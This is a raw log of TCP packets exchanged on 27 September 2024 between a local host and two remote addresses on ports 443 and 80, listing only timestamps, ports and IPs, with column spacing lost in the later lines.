Sep 27, 2024 17:42:24.000543118 CEST          443      49780  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.132370949 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.132471085 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.132566929 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.132920980 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.132961035 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.273719072 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.273768902 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.273837090 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.274305105 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:24.274317980 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:24.577430964 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:24.577539921 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:24.578175068 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:24.579973936 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:24.580118895 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:24.816307068 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.128937006 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.628432035 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.628493071 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.629648924 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.629722118 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.633645058 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.633656979 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.633946896 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.859296083 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.859874964 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.973428965 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.973691940 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.980443954 CEST           80      49784  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.980529070 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.980649948 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.985730886 CEST           80      49781  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:25.985812902 CEST        49781         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:25.989013910 CEST           80      49784  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:26.099725962 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.099886894 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.101064920 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.101149082 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.101350069 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.101366043 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.101604939 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.102418900 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.102457047 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.102720976 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.103327036 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.103440046 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.147403955 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.151408911 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618475914 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618475914 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618601084 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618617058 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618669987 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.618695974 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.618891954 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.618928909 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618949890 CEST        49782        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.618957996 CEST          443      49782  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.618999958 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.618999958 CEST        49783        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.619028091 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.619040966 CEST          443      49783  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.706039906 CEST           80      49784  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:26.707308054 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:26.708297014 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:26.715596914 CEST           80      49784  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:26.913959026 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.914063931 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.914191008 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.914566040 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.914602041 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.945451975 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.945496082 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:26.945597887 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.945933104 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:26.945955038 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.003106117 CEST           80      49784  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:27.003326893 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.114377022 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.114723921 CEST        49787         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.129440069 CEST           80      49787  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:27.129560947 CEST        49787         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.129723072 CEST        49787         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.131136894 CEST           80      49784  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:27.131191969 CEST        49784         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.144740105 CEST           80      49787  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:27.499007940 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.499123096 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.500628948 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.500639915 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.500886917 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.501853943 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.509294987 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.509382963 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.514594078 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.514606953 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.514900923 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.515804052 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.543401957 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.559396029 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.951656103 CEST           80      49787  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:27.951847076 CEST        49787         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.952778101 CEST        49787         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:27.981014013 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.981127977 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.981184006 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.981329918 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.981384993 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.981420994 CEST        49786        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.981437922 CEST          443      49786  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.995029926 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.995146990 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.995202065 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.995445013 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.995459080 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.995485067 CEST        49785        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:27.995496035 CEST          443      49785  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:27.997137070 CEST           80      49787  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:28.227019072 CEST           80      49787  185.215.113.16   192.168.2.4
Sep 27, 2024 17:42:28.227229118 CEST        49787         80  192.168.2.4      185.215.113.16
Sep 27, 2024 17:42:28.242451906 CEST        49788        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:28.242502928 CEST          443      49788  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:28.242588043 CEST        49788        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:28.243057966 CEST        49788        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:28.243074894 CEST          443      49788  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:28.289619923 CEST        49789        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:28.289721966 CEST          443      49789  172.67.187.100   192.168.2.4
Sep 27, 2024 17:42:28.289800882 CEST        49789        443  192.168.2.4      172.67.187.100
Sep 27, 2024 17:42:28.290246964 CEST        49789        443  192.168.2.4      172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.290278912 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.332679033 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.333039999 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.342363119 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.342489958 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.342701912 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.345247030 CEST8049787185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.345314026 CEST4978780192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:28.355737925 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.808063984 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.808178902 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.809562922 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.809572935 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.810208082 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.811142921 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.815171957 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.815262079 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.816255093 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.816277981 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.816540003 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.817259073 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:28.855416059 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:28.863406897 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.073491096 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.073677063 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.074568033 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.080918074 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.245394945 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.245656967 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.245716095 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.249564886 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.249583960 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.249593019 CEST49788443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.249598026 CEST44349788172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.259638071 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.260827065 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.260886908 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.269103050 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.269155025 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.269186020 CEST49789443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.269202948 CEST44349789172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.298993111 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.299055099 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.411294937 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.411832094 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.419414997 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.419485092 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.420056105 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.421042919 CEST8049790185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.421102047 CEST4979080192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:29.428483963 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.586216927 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.586328030 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.586443901 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.586749077 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.586785078 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.663830042 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.663877964 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:29.664125919 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.664545059 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:29.664555073 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.183695078 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.183847904 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.184762001 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.208410025 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.210444927 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.210644007 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.211997986 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.212009907 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.212256908 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.213154078 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.259411097 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.260927916 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.261040926 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.262407064 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.262443066 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.262790918 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.263623953 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.311424971 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.460691929 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.460761070 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.569399118 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.569742918 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.579770088 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.579910994 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.580265045 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.581228971 CEST8049791185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.581295967 CEST4979180192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:30.591861963 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.663578033 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.663672924 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.663892031 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.663983107 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.664015055 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.664052963 CEST49793443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.664060116 CEST44349793172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.704705000 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.705440044 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.707180023 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.707264900 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.707319021 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.707355976 CEST49792443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.707375050 CEST44349792172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.977154970 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.977238894 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.977328062 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.977662086 CEST49795443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.977694988 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.992408991 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.992455006 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:30.992597103 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.992983103 CEST49796443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:30.993001938 CEST44349796172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.323282957 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.323369980 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.325284958 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.550769091 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.624974012 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.625026941 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.625081062 CEST4979480192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:31.625641108 CEST8049794185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:31.626753092 CEST44349795172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.340430021 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.392498016 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.392632008 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.420996904 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.421117067 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.497891903 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.497920990 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.498270988 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.499072075 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.503202915 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.505944967 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.511040926 CEST8049802185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.511090040 CEST4980280192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.512008905 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.512048960 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.512378931 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.513068914 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.513144970 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.543443918 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.548861027 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:34.554471016 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.566387892 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.606240988 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.651412010 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.824911118 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.825021029 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.825119019 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.825496912 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.825544119 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.825577974 CEST49803443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.825597048 CEST44349803172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919162989 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919266939 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919336081 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.919753075 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.919771910 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:34.919822931 CEST49804443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:34.919830084 CEST44349804172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.274259090 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.274319887 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.275623083 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.280626059 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.431230068 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.431278944 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.431730032 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.431730032 CEST49806443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.431766033 CEST44349806172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.504559994 CEST8049805185.215.113.16192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.504622936 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.554371119 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.554485083 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.554589987 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.554919004 CEST49807443192.168.2.4172.67.187.100
                                                                                                                                                                Sep 27, 2024 17:42:35.554955959 CEST44349807172.67.187.100192.168.2.4
                                                                                                                                                                Sep 27, 2024 17:42:35.614154100 CEST4980580192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.614569902 CEST4980880192.168.2.4185.215.113.16
                                                                                                                                                                Sep 27, 2024 17:42:35.619846106 CEST8049805185.215.113.16192.168.2.4
